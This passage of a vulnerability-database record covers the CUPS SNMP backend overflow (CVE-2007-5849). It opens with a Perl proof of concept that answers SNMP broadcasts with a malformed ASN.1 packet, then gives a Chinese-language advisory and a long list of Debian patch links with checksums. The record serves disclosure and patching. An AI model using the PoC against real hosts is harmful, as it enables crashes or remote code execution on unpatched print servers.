buffer.\r\n\r\nExploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software. Failed exploit attempts will likely result in denial-of-service conditions.\r\n\r\nThis issue affects CUPS 1.2 and 1.3, prior to 1.3.5; other versions may also be vulnerable.\r\n\r\nP0C:\r\n===\r\n#!/usr/bin/perl\r\n#if 0\r\n# backend_snmp_poc.pl write by wei_wang@mcafee.com\r\n# 2007-11-06\r\n#\r\n# snmp.c asn1_get_string integer overflow cups 1.3.4\r\n#\r\n# packet->error = \"No community name\";\r\n# else if ((length = asn1_get_length(&bufptr, bufend)) == 0)\r\n# packet->error = \"Community name uses indefinite length\";\r\n# else\r\n# {\r\n# asn1_get_string(&bufptr, bufend, length, packet->community,\r\n# sizeof(packet->community));\r\n#\r\n# if ((packet->request_type = asn1_get_type(&bufptr, bufend))\r\n#\r\n#002a: 30 38 tag=0x30 len=0x38\r\n#002c: 02 01 00 version:1 (0)\r\n#002f: 04 84 ff ff ff ff 69 63 community:public\r\n#len is 0xffffffff\r\n#endif\r\n\r\nmy $payload =\"\\x30\\x38\\x02\\x01\\x00\\x04\\x84\\xff\\xff\\xff\\xff\\x41\\x41\";\r\n\r\nuse strict;\r\nmy $PF_INET=2;\r\nmy $SOCK_DGRAM=2;\r\nmy $port=161;\r\nmy $proto=getprotobyname('udp');\r\nmy $addres=pack('SnC4x8',$PF_INET,$port,0,0,0,0);\r\nmy ($Cmd);\r\nsocket(SOCKET,$PF_INET,$SOCK_DGRAM,$proto) or die \"Can't build a socket\";\r\nbind (SOCKET,$addres);\r\nwhile(1)\r\n{\r\n my $rip=recv (SOCKET,$Cmd,100,0);\r\n send (SOCKET,$payload,0,$rip) or die \"send false\";\r\n print \"$Cmd\";\r\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30898/"}], "seebug": [{"lastseen": "2017-11-19T21:51:16", "description": "BUGTRAQ ID: 26917\r\nCVE(CAN) ID: CVE-2007-5849\r\n\r\nCommon Unix Printing System (CUPS)\u662f\u4e00\u6b3e\u901a\u7528Unix\u6253\u5370\u7cfb\u7edf\uff0c\u662fUnix\u73af\u5883\u4e0b\u7684\u8de8\u5e73\u53f0\u6253\u5370\u89e3\u51b3\u65b9\u6848\uff0c\u57fa\u4e8eInternet\u6253\u5370\u534f\u8bae\uff0c\u63d0\u4f9b\u5927\u591a\u6570PostScript\u548craster\u6253\u5370\u673a\u670d\u52a1\u3002\r\n\r\nCUPS\u5904\u7406\u5305\u542b\u7578\u5f62\u6570\u636e\u7684SNMP\u8bf7\u6c42\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63a7\u5236\u670d\u52a1\u5668\u3002\r\n\r\nCUPS\u7684backend/snmp.c\u6587\u4ef6\u4e2d\u7684asn1_get_string()\u51fd\u6570\u5b58\u5728\u7b26\u53f7\u9519\u8bef\u3002\u5f53\u540e\u7aefSNMP\u7a0b\u5e8f\u5e7f\u64adSNMP\u8bf7\u6c42\u53d1\u73b0\u7f51\u7edc\u6253\u5370\u670d\u52a1\u5668\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u56de\u590d\u7578\u5f62\u7684SNMP\u8bf7\u6c42\uff0c\u540e\u7aefSNMP\u7a0b\u5e8f\u5904\u7406\u5305\u542b\u6709\u8d1f\u503casn1\u7f16\u7801\u5b57\u7b26\u4e32\u7684SNMP\u54cd\u5e94\u65f6\u5c31\u4f1a\u89e6\u53d1\u6808\u6ea2\u51fa\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\n\nApple CUPS <= 1.3.4\n Apple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.cups.org/strfiles/2589/str2589.patch target=_blank>http://www.cups.org/strfiles/2589/str2589.patch</a>\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1437-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1437-1\uff1aNew cupsys packages fix several vulnerabilities\r\n\u94fe\u63a5\uff1a<a href=http://www.debian.org/security/2007/dsa-1437 target=_blank>http://www.debian.org/security/2007/dsa-1437</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2.dsc target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2.dsc</a>\r\nSize/MD5 checksum: 1084 7eda7d3797d141d174e163f837cd91b4\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz</a>\r\nSize/MD5 checksum: 4214272 c9ba33356e5bb93efbcf77b6e142e498\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2.diff.gz target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2.diff.gz</a>\r\nSize/MD5 checksum: 103089 a856a1ff975042783cb87f23d15e5b3a\r\n\r\nArchitecture independent packages:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch2_all.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch2_all.deb</a>\r\nSize/MD5 checksum: 45246 3216cd80859aa97b7c8c5774b2462db2\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch2_all.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch2_all.deb</a>\r\nSize/MD5 checksum: 893020 28b90e7e58400b9216f72cecf7de0d4a\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 1096542 686386cd43230708d49cea4af0d57b9f\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 94468 32d1efdef788039ac00ed1e57a6fcc47\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 1608840 d042363f0999e1f11939e3f5e8de8b38\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 72432 5e43d1208715258c4ff09dcee0fa4081\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 86284 dca9ccc53cb8fcf7b8e1a44b8e76a6ad\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 184372 cb6c4f2c2a08ccc55c25c35d039fe400\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 39260 cdfc7a39f71c1aed6973a2956cf8749d\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_alpha.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_alpha.deb</a>\r\nSize/MD5 checksum: 174608 e2c1ebf86bfc9f538a640c8ea385330f\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 142552 60167bc344afbaa54904b295c78def9c\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 36366 3feca5f614aca7d527b1beba01462f6e\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 161666 65ebf0f70d842eeb8adc309946357b4d\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 85314 0be1f821b4880c7a4b83cd7779edbce4\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 80704 26db3ea2f4aee728ead9ffba2686b827\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 1574360 3a1e7f5f6a8766a1f89aa65fc47c5d72\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 52862 3e8caecdc231fcded29f0029b76019a8\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_amd64.deb</a>\r\nSize/MD5 checksum: 1085694 235f96f3c07947ab11cd4222490441f0\r\n\r\narm architecture (ARM)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 48532 08ce8a9c2d9edf30a381ddc34073c397\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 1025036 c3165815ab4292c0b200176c4c0ad7d6\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 35924 02c6ebde8deb0fcb39074deb5895b95b\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 78912 33627a4c4e1dd3b4001f165cfda64259\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 132054 c4e04d8fb763e599931f3cb0207d84cb\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 154314 0dcbd01293a5a0925af776bc0d6490fa\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 84494 66ff0b8a8b07d0faddee758806e044be\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_arm.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_arm.deb</a>\r\nSize/MD5 checksum: 1568356 725c88c2ac3737a0a323e82a5877f8f9\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 39264 528456372ac16c6dc257d2672a24cc84\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 85260 60da86a4e6b72d49f3c405cda6eaaa33\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 90316 7d7093a9bca7c6ee4a190eaea715cf1f\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 57026 7e78c5bf532b9761b6ebc290c4c24b94\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 171548 37bfd1849d459be20f5df6da4d0e8f19\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 1611932 3a3e91d8c878c6ec42a99d1bfacbafac\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 154600 fc87ba725d54223245d9cb71777307a7\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_hppa.deb</a>\r\nSize/MD5 checksum: 1031728 cdcfb63a3a2200f4ca36aa0d530c32d9\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 53068 e28d98e95a5e543991b996e84d028863\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 138280 28df76637f6b23d98ec81f6a7bf2b6ba\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 159796 fa2db05d879ce293041be45683febe8b\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 1547840 6d7396410919ae7207d3d9aadfb5026f\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 79880 c392020f91e2901d4122ef6a1fa08fed\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 85778 a11291b1a834d42ba160fb8d92db0c3a\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 997490 0d91574ed291678037351dd0a32f445f\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_i386.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_i386.deb</a>\r\nSize/MD5 checksum: 36476 ee84ce1774c646915ba410dadcda3470\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 1107194 dc683bec9dcfffc4a1e020b2859e1fab\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 106228 db41cfc57bf2d43da703285f9790344c\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 46332 f52d7a07c6acf6613da1ae43f64b8ef7\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 203378 9da06426a99702d4485b528d542b666d\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 105872 cd243300f6b804b2501e5681401c574e\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 73934 b3618bd2d5b1de8371ea56301312ef3a\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 192368 35aba3be08e6a72b54617bb666b12d4c\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_ia64.deb</a>\r\nSize/MD5 checksum: 1769808 8d0ab1028149cabd9d946c44cf4d4f86\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 77158 5302b4e5edb3d0d7733481eaabdbddcf\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 85874 d6beacabf8db05137b4c4357ea7557e9\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 157884 d0f4ed5d1da24041179f9f2697f2ffcb\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 1096124 feea35b2ae01af3b06ee3ce8a854324e\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 35968 0bb0b6c1018c466326b6406de4af093e\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 150766 ff55f24b0b36722265644252857d8b5c\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 1550792 97167182293fc8400cb9fefffc3670e7\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_mips.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_mips.deb</a>\r\nSize/MD5 checksum: 57384 b2473f40bde45105c0bdec916ff93cdb\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 86054 f78f586a8f15727e28c67bca58caaa26\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 1552410 94190014545b85b403a21e97d9901776\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 157716 e0bd0f1e90b1124b1441bc1f313a7764\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 1083814 a5968478d72e11f19d4e019d3095e51f\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 36068 363ff5b0694c2fef407a92dea1ba1c4e\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 77458 db7144590602bf3cf25cba5fdce485a8\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 57700 04626a4cb44728ea61bcb7f8d8ddc1ed\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_mipsel.deb</a>\r\nSize/MD5 checksum: 150902 f3cb4f6ca36503d7b70aab6d559199d2\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 51792 e89680c8a9b4851ebb5ad0d304e6bbb7\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 90002 ce367709844a87951f810524aadfea4c\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 136864 0aabc007ab84b86a77f6c601ba8d44fd\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 87576 f18bba76c873a6238e78a80182c0cd38\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 1575144 506c85d9a8b03be737ccb8dd3fd31248\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 1141712 b6ab866de7c8c6f2051c2a813003a722\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 162358 08096969b7e8ef48d2ece9a86600004a\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_powerpc.deb</a>\r\nSize/MD5 checksum: 41290 b7eb0528a3b1b8bd07247fd9e16b76c2\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 1586292 01001ec68f5ff6a090ebff3099265be0\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_s390.deb 